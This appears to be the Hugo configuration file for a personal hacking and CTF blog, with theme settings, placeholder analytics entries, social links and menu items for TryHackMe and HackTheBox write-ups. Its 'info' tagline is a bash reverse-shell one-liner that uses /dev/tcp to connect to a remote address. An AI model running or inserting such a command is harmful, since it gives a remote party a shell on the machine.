baseURL = "https://d4rkn1gh7.github.io"
title = "d4rkn1gh7 | Tech Blog"

theme = "hugo-coder"

languageCode = "en"
defaultContentLanguage = "en"

paginate = 20

pygmentsStyle = "b2"
pygmentsCodeFences = true
pygmentsCodeFencesGuessSyntax = true

disqusShortname = "yourdiscussshortname"

[params]
    author = "d4rkn1gh7 | Balaji Anandhan"
    description = "d4rkn1gh7 | Tech Blog"
    keywords = "blog,ctf,hacking,coding"
    info = "sh -i >& /dev/tcp/1.1.1.1/1111 0>&1"
    avatarURL = "images/avatar.png"
    #gravatar = "balaji006@protonmail.com"
    footerContent = "Hack The Planet!"

    dateFormat = "January 2, 2006"

    hideFooter = false
    hideCredits = true
    hideCopyright = false
    since = 2019

    # Git Commit in Footer, uncomment the line below to enable it.
    commit = "https://github.com/luizdepra/hugo-coder/tree/"

    rtl = false

    # Specify light/dark colorscheme
    # Supported values:
    # "auto" (use preference set by browser)
    # "dark" (dark background, light foreground)
    # "light" (light background, dark foreground) (default)
    colorScheme = "auto"

    # Hide the toggle button, along with the associated vertical divider
    hideColorSchemeToggle = false

    # Series see also post count
    maxSeeAlsoItems = 5

    # Enable Twemoji
    enableTwemoji = true

    # Custom CSS
    customCSS = []

    # Custom SCSS
    customSCSS = []

    # Custom JS
    customJS = []


# If you want to use fathom(https://usefathom.com) for analytics, add this section
[params.fathomAnalytics]
    siteID = "ABCDE"
    # Default value is cdn.usefathom.com, overwrite this if you are self-hosting
    serverURL = "analytics.example.com"

# If you want to use plausible(https://plausible.io) for analytics, add this section
[params.plausibleAnalytics]
    domain = "example.com"
    # Default value is plausible.io, overwrite this if you are self-hosting or using a custom domain
    serverURL = "analytics.example.com"

# If you want to use goatcounter(https://goatcounter.com) for analytics, add this section
[params.goatCounter]
    code = "code"

# If you want to use Cloudflare Web Analytics(https://cloudflare.com) for analytics, add this section
[params.cloudflare]
    token = "token"

[taxonomies]
  category = "categories"
  series = "series"
  tag = "tags"
  author = "authors"

[[params.social]]
    name = "Github"
    icon = "fa fa-github"
    weight = 1
    url = "https://github.com/d4rkn1gh7/"
[[params.social]]
    name = "Instagram"
    icon = "fa fa-instagram"
    weight = 1
    url = "https://www.instagram.com/_balaji_6120/"

[[params.social]]
    name = "E-Mail"
    icon = "fa fa-envelope"
    weight = 1
    url = "mailto:latanandb2@gmail.com"
[[params.social]]
    name = "Linux-OS"
    icon = "fa fa-linux"
    weight = 1
    url = "https://www.kali.org/"
[[params.social]]
  name = "Linked-In Profile"
  icon = "fa fa-linkedin"
  weight = 1
  url = "https://www.linkedin.com/in/balaji-anandhan-5140901a8"
    

[languages]
    [languages.en]
        languageName = "English"

        [languages.en.menu]

            [[languages.en.menu.main]]
            name = "Posts"
            weight = 1
            url = "posts/"

            [[languages.en.menu.main]]
            name = "TryHackMe"
            weight = 2
            url = "categories/tryhackme"

            [[languages.en.menu.main]]
            name = "HackTheBox"
            weight = 3
            url = "categories/hackthebox"
            
            [[languages.en.menu.main]]
            name = "Coding | Linux"
            weight = 4
            url = "categories/codinglinux"
            
            [[languages.en.menu.main]]
            name = "Tags"
            weight = 4
            url = "tags/"
            
            [[languages.en.menu.main]]
            name = "$whoami"
            weight = 5
            url = "about/"


    
